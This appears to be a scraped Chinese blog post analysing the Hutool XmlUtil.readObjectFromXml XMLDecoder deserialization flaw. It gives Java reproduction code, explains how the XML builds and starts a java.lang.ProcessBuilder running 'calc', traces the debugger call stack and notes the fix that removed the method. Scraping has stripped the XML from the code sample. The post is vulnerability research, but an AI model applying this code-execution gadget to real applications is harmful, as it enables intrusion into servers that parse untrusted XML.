hutool XML反序列化漏洞(CVE

您所在的位置:网站首页 xml反序列化漏洞 hutool XML反序列化漏洞(CVE

hutool XML反序列化漏洞(CVE

#hutool XML反序列化漏洞(CVE| 来源: 网络整理| 查看: 265

漏洞简介

  Hutool 中的XmlUtil.readObjectFromXml方法直接封装调用XMLDecoder.readObject解析xml数据,当使用 readObjectFromXml 去处理恶意的 XML 字符串时会造成任意代码执行。

漏洞复现

  我们在 maven 仓库中查找 Hutool

  ​https://mvnrepository.com/search?q=Hutool​

  ​image

  ​image

  把依赖复制出来,添加到项目的 pom.xml 文件中

cn.hutool hutool-all 5.8.11

  添加完成后刷新一下 maven 依赖

  我们编写代码

import cn.hutool.core.util.XmlUtil;public class Test { public static void main(String[] args) { XmlUtil.readObjectFromXml("\n" + " \n" + " \n" + " \n" + " calc\n" + " \n" + " \n" + " \n" + " \n" + "\n"); }}

  ​5

  在项目目录下创建一个 bean.xml​ 文件,将 xml 放在文件中,构造代码也可以触发

import cn.hutool.core.util.XmlUtil;import java.io.File;​public class Test { public static void main(String[] args) { File file = new File("bean.xml"); XmlUtil.readObjectFromXml(file); }}

  ​6

漏洞分析

  整个漏洞分析下来相对来时是比较简单的,但是深入搞清楚 XML 反序列化的原理需要花费不小的功夫

  ​cn.hutool.core.util.XmlUtil#readObjectFromXml(java.lang.String)​

  ​image

  当然这个地方也是可以通过读取文件来实现的

  ​cn.hutool.core.util.XmlUtil#readObjectFromXml(java.io.File)​

  ​image

  ​cn.hutool.core.util.XmlUtil#readObjectFromXml(org.xml.sax.InputSource)​

  ​image

  ​java.beans.XMLDecoder#readObject​

  ​image

  漏洞本质上是 java 原生方法中的漏洞,XMLDecoder.readObject 。所以不去调用 hutool-all 中的 readObjectFromXml​ 方法 就可以避免这个漏洞的产生。

帮助网安学习,全套资料S信领取:

① 网安学习成长路径思维导图 ② 60+网安经典常用工具包 ③ 100+SRC分析报告 ④ 150+网安攻防实战技术电子书 ⑤ 最权威CISSP 认证考试指南+题库 ⑥ 超1800页CTF实战技巧手册 ⑦ 最新网安大厂面试题合集(含答案) ⑧ APP客户端安全检测指南(安卓+IOS)

漏洞修复

  在最新版的 hutool-all 没有用黑名单,而是直接移除了 readObjectFromXml​ 方法,简单粗暴。

  ​image

XMLDecoder.readObject calc

  ‍

  object 标签,class 的值对应着实例化的全类名(java.lang.ProcessBuilder)

  array 标签,class 的值对应着实例化的全类名对象构造的参数(ProcessBuilder 对象的构造参数)

  void 标签,method 的值对应着 method 的参数 (start)

  最后相当于执行了

new java.lang.ProcessBuilder(new String[]{"calc"}).start();

  ‍

  为了方便看到整个调用联的流程,我们在触发漏洞的位置加上断点,分析其中经过了那些处理

  ​java.lang.ProcessBuilder#start​

  ​image

  ‍

start:1007, ProcessBuilder (java.lang)invoke0:-1, NativeMethodAccessorImpl (sun.reflect)invoke:62, NativeMethodAccessorImpl (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)invoke:71, Trampoline (sun.reflect.misc)invoke0:-1, NativeMethodAccessorImpl (sun.reflect)invoke:62, NativeMethodAccessorImpl (sun.reflect)invoke:43, DelegatingMethodAccessorImpl (sun.reflect)invoke:498, Method (java.lang.reflect)invoke:275, MethodUtil (sun.reflect.misc)invokeInternal:292, Statement (java.beans)access$000:58, Statement (java.beans)run:185, Statement$2 (java.beans)doPrivileged:-1, AccessController (java.security)invoke:182, Statement (java.beans)getValue:155, Expression (java.beans)getValueObject:166, ObjectElementHandler (com.sun.beans.decoder)getValueObject:123, NewElementHandler (com.sun.beans.decoder)endElement:169, ElementHandler (com.sun.beans.decoder)endElement:318, DocumentHandler (com.sun.beans.decoder)endElement:609, AbstractSAXParser (com.sun.org.apache.xerces.internal.parsers)scanEndElement:1782, XMLDocumentFragmentScannerImpl (com.sun.org.apache.xerces.internal.impl)next:2967, XMLDocumentFragmentScannerImpl$FragmentContentDriver (com.sun.org.apache.xerces.internal.impl)next:602, XMLDocumentScannerImpl (com.sun.org.apache.xerces.internal.impl)scanDocument:505, XMLDocumentFragmentScannerImpl (com.sun.org.apache.xerces.internal.impl)parse:842, XML11Configuration (com.sun.org.apache.xerces.internal.parsers)parse:771, XML11Configuration (com.sun.org.apache.xerces.internal.parsers)parse:141, XMLParser (com.sun.org.apache.xerces.internal.parsers)parse:1213, AbstractSAXParser (com.sun.org.apache.xerces.internal.parsers)parse:643, SAXParserImpl$JAXPSAXParser (com.sun.org.apache.xerces.internal.jaxp)parse:327, SAXParserImpl (com.sun.org.apache.xerces.internal.jaxp)run:375, DocumentHandler$1 (com.sun.beans.decoder)run:372, DocumentHandler$1 (com.sun.beans.decoder)doPrivileged:-1, AccessController (java.security)doIntersectionPrivilege:74, ProtectionDomain$JavaSecurityAccessImpl (java.security)parse:372, DocumentHandler (com.sun.beans.decoder)run:201, XMLDecoder$1 (java.beans)run:199, XMLDecoder$1 (java.beans)doPrivileged:-1, AccessController (java.security)parsingComplete:199, XMLDecoder (java.beans)readObject:250, XMLDecoder (java.beans)main:20, xmldecode (xml)

  ‍

  比较关键的处理逻辑是在 com.sun.org.apache.xerces.internal.impl.XMLDocumentFragmentScannerImpl#scanDocument​开始对 xml 进行解析

  ​image

  ‍

  先简单描述一下我的理解,然后再截图与之相对应,可能部分理解并不完全正确

  根据 xml 文件的中的标识来识别开始还是结束



【本文地址】


今日新闻


推荐新闻


    CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3